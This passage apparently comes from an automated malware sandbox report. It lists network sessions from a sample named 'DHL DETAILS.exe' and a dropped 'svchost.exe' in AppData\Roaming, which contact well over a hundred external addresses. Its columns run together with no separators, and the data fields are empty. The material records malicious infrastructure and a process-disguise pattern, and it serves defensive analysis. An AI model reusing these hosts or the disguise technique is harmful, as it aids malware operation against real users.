                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6215192.168.2.558423203.74.125.18888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6216192.168.2.558738185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6217192.168.2.558535195.248.243.149723743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6218192.168.2.556360142.54.232.6414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6219192.168.2.549334142.44.210.1748056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6220192.168.2.55871443.255.113.232808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6221192.168.2.558716106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6222192.168.2.555475162.214.102.1953422743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6223192.168.2.562794162.241.158.2045056356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6224192.168.2.558718103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6225192.168.2.555351200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6226192.168.2.555409144.24.77.905555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6227192.168.2.555862208.87.131.2402256643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6228192.168.2.560962104.37.135.145414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6229192.168.2.56153746.17.63.166948043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6230192.168.2.561095164.92.86.1136411043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6231192.168.2.56157845.120.178.197108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6232192.168.2.561570134.209.105.209312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6233192.168.2.561583121.159.146.2518043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6234192.168.2.56109935.237.210.215312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6235192.168.2.561598120.48.62.239808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6236192.168.2.561605103.23.100.1414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6237192.168.2.561625119.196.168.1838043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6238192.168.2.561606222.223.103.232730243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6239192.168.2.56115088.198.82.189312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6240192.168.2.56162645.138.87.238108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6241192.168.2.561624190.128.228.1828043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6242192.168.2.555514212.47.245.571637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6243192.168.2.55874349.4.48.128888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6244192.168.2.558756203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6245192.168.2.5587648.217.143.1871567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6246192.168.2.55876839.105.27.30312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6247192.168.2.55862551.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6248192.168.2.558771138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6249192.168.2.558773139.129.162.65312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6250192.168.2.55878289.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6251192.168.2.55642392.204.134.382971843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6252192.168.2.555969199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6253192.168.2.562869176.236.163.375931156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6254192.168.2.55689564.44.139.122003743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6255192.168.2.557248166.62.38.100245343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6256192.168.2.55634146.101.186.2388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6257192.168.2.556928146.59.147.116280143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6258192.168.2.54959737.187.77.584950743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6259192.168.2.54955837.187.73.71611343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6260192.168.2.549606192.145.228.212808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6261192.168.2.549913190.5.77.211806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6262192.168.2.550333149.102.130.120806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6263192.168.2.558040195.98.93.234108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6264192.168.2.557866119.18.146.114502043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6265192.168.2.558795104.25.194.1758043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6266192.168.2.55811345.117.179.240852043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6267192.168.2.558796193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6268192.168.2.55814892.204.134.381539343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6269192.168.2.55825145.6.224.25499943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6270192.168.2.558308192.69.57.11609943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6271192.168.2.55093651.222.241.157225386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6272192.168.2.558755211.93.2.190730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6273192.168.2.55569651.161.131.845861243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6274192.168.2.5494125.45.73.25839856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6275192.168.2.556137180.191.254.127808243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6276192.168.2.55590747.93.113.251312943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6277192.168.2.54939546.47.197.210312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6278192.168.2.556772104.200.135.46414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6279192.168.2.556304207.244.241.1656040243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6280192.168.2.556400162.214.121.1736457943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6281192.168.2.562920192.163.202.884758556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6282192.168.2.549404104.225.220.2338056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6283192.168.2.556116102.130.125.868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6284192.168.2.56292939.109.113.97312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6285192.168.2.56294251.89.173.401798256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6286192.168.2.56300175.119.145.1691621656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6287192.168.2.55628682.223.121.721546443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6288192.168.2.55047354.36.122.16297966352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6289192.168.2.55097918.166.142.18010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6290192.168.2.55662451.79.87.1445439543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6291192.168.2.55889423.152.40.14312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6292192.168.2.558871184.170.249.65414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6293192.168.2.558910199.102.107.145414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6294192.168.2.55891467.227.186.235767643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6295192.168.2.55027572.195.34.5941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6296192.168.2.5584115.161.231.348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6297192.168.2.558872177.234.244.1743221343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6298192.168.2.5510295.180.19.16310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6299192.168.2.550882202.191.127.2180906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6300192.168.2.55834820.0.91.1508043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6301192.168.2.558925186.150.207.207808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6302192.168.2.55889939.108.229.14800243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6303192.168.2.558944195.90.216.75108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6304192.168.2.55892447.56.110.204898943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6305192.168.2.558915120.77.148.138808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6306192.168.2.55900945.61.188.1344449943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6307192.168.2.558707184.181.217.220414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6308192.168.2.558453202.61.204.518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6309192.168.2.558913116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6310192.168.2.558999158.255.215.501699343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6311192.168.2.559011203.74.125.18888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6312192.168.2.559054172.67.231.38043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6313192.168.2.56291654.38.176.2002659156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6314192.168.2.549423185.49.31.207808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6315192.168.2.558988175.183.82.2218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6316192.168.2.55896043.231.22.2298043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6317192.168.2.549468104.238.111.1072839456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6318192.168.2.558721140.238.25.2552100043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6319192.168.2.55910445.14.174.1488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6320192.168.2.559114104.16.230.1638043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6321192.168.2.559142104.16.105.2078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6322192.168.2.55894572.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6323192.168.2.559042203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6324192.168.2.558744199.102.106.94414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6325192.168.2.558645111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6326192.168.2.549456189.142.126.22099956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6327192.168.2.549452194.31.79.755092056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6328192.168.2.558719219.71.216.788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6329192.168.2.559127208.87.131.2404136843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6330192.168.2.5590538.217.143.1871567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6331192.168.2.55905651.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6332192.168.2.54947092.204.134.385292956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6333192.168.2.559169199.102.107.145414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6334192.168.2.559057193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6335192.168.2.559155198.44.255.38043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6336192.168.2.55914341.111.243.188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6337192.168.2.55904694.20.183.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6338192.168.2.559077128.199.165.633357443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6339192.168.2.559100167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6340192.168.2.55910345.11.95.165603943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6341192.168.2.559157187.40.1.12312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6342192.168.2.559193184.170.249.65414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6343192.168.2.56313037.187.77.581976756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6344192.168.2.557262203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6345192.168.2.563094112.5.128.78806056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6346192.168.2.56314975.119.145.1696134456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6347192.168.2.563141148.66.130.535420956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6348192.168.2.563168148.66.130.53783056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6349192.168.2.549700135.148.10.1614114656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6350192.168.2.559138212.108.155.205909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6351192.168.2.55141292.205.110.11834146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6352192.168.2.559110103.148.51.19808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6353192.168.2.559217198.57.211.2351109643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6354192.168.2.551817178.115.253.3580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


